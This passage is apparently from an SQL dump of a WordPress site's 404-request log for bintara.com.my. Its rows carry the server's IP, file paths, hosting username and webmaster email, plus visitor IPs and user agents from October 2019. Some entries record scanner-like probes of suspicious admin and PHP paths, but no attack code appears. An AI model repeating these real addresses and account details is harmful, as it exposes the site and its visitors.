Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:4:\"POST\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-icoud.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:13:\"/wp-icoud.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XapP@NW6eau1YwLtPYEORgAAApU\";s:19:\"REDIRECT_SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-icoud.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:13:\"/wp-icoud.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XapP@NW6eau1YwLtPYEORgAAApU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"193.106.30.99\";s:11:\"REMOTE_PORT\";s:5:\"52354\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-icoud.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-icoud.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XapP@NW6eau1YwLtPYEORgAAApU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571442680.1579\";s:12:\"REQUEST_TIME\";s:10:\"1571442680\";}}','notice','2019-10-18 23:51:23','2019-10-18 23:51:20',35368344,37175568,'https://bintara.com.my/wp-icoud.php',1,0,'193.106.30.99'),(28352,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:153:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.104 Safari/537.36 Core/1.53.4843.400 QQBrowser/9.7.13021.400\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"137.74.4.69\";s:11:\"REMOTE_PORT\";s:5:\"57916\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaphMef6O@tGueEpyrGlBQAAAA8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571447090.0024\";s:12:\"REQUEST_TIME\";s:10:\"1571447090\";}}','notice','2019-10-19 01:04:52','2019-10-19 01:04:50',35308920,37113432,'https://bintara.com.my/?page_id=18',1,0,'137.74.4.69'),(28353,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=11\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:129:\"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 UBrowser/6.2.4091.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=11\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"176.61.140.104\";s:11:\"REMOTE_PORT\";s:5:\"48397\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XapmAef6O@tGueEpyrGqKQAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571448321.6325\";s:12:\"REQUEST_TIME\";s:10:\"1571448321\";}}','notice','2019-10-19 01:25:24','2019-10-19 01:25:22',35310568,37113080,'https://bintara.com.my/?page_id=11',1,0,'176.61.140.104'),(28354,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"2548F25C-408A-4D02-83A7-0685EF567CFC\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xap01wZfHioVGWbjloHjnwAAAMc\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"183.171.185.87\";s:11:\"REMOTE_PORT\";s:5:\"54271\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xap01wZfHioVGWbjloHjnwAAAMc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571452119.7703\";s:12:\"REQUEST_TIME\";s:10:\"1571452119\";}}','notice','2019-10-19 02:28:43','2019-10-19 02:28:40',35663192,37456528,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'183.171.185.87'),(28355,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/21.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"223.206.243.10\";s:11:\"REMOTE_PORT\";s:5:\"59077\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaqCGs9v17oVdvtXjHYURAAAAs4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571455514.2901\";s:12:\"REQUEST_TIME\";s:10:\"1571455514\";}}','notice','2019-10-19 03:25:17','2019-10-19 03:25:14',35310600,37117360,'https://bintara.com.my/?page_id=18',1,0,'223.206.243.10'),(28356,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:36:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:113:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3423.2 Safari/537.36\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"66.110.216.221\";s:11:\"REMOTE_PORT\";s:5:\"37428\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaqlxvivEQeUaFKlM5aKVgAAAII\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571464647.0586\";s:12:\"REQUEST_TIME\";s:10:\"1571464647\";}}','notice','2019-10-19 05:57:29','2019-10-19 05:57:27',35308448,37123840,'https://bintara.com.my/?page_id=18',1,0,'66.110.216.221'),(28357,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:48:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"316\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.11328; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"B658107A-9B2B-49AD-9004-9FB4B8725012\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11328\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XarjAYagLkv5hpb4fc1cZgAAAQ4\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"113.210.107.70\";s:11:\"REMOTE_PORT\";s:5:\"50936\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XarjAYagLkv5hpb4fc1cZgAAAQ4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571480321.8823\";s:12:\"REQUEST_TIME\";s:10:\"1571480321\";}}','notice','2019-10-19 10:18:43','2019-10-19 10:18:42',35275560,37074992,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'113.210.107.70'),(28358,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:82:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; MANMJS; rv:11.0) like Gecko\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:10:\"page_id=18\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"157.245.209.92\";s:11:\"REMOTE_PORT\";s:5:\"33634\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"XaruywZfHioVGWbjloH6ygAAAMQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571483339.5831\";s:12:\"REQUEST_TIME\";s:10:\"1571483339\";}}','notice','2019-10-19 11:09:02','2019-10-19 11:09:00',35311520,37111648,'https://bintara.com.my/?page_id=18',1,0,'157.245.209.92'),(28418,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:14:\"CONTENT_LENGTH\";s:1:\"0\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"HTTP_USER_AGENT\";s:51:\"Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.2)\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xas7TfBciE@oGFkw1sco6QAAARE\";s:12:\"REDIRECT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"REMOTE_ADDR\";s:12:\"23.228.90.14\";s:11:\"REMOTE_PORT\";s:5:\"53579\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:65:\"http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:10:\"SCRIPT_URL\";s:44:\"/admin_aspcms/_system/AspCms_SiteSetting.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xas7TfBciE@oGFkw1sco6QAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571502925.4815\";s:12:\"REQUEST_TIME\";s:10:\"1571502925\";}}','notice','2019-10-19 16:35:27','2019-10-19 16:35:25',35261736,37064416,'http://bintara.com.my/admin_aspcms/_system/AspCms_SiteSetting.asp',1,0,'23.228.90.14'),(28419,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:12:\"/?page_id=18\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:69:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 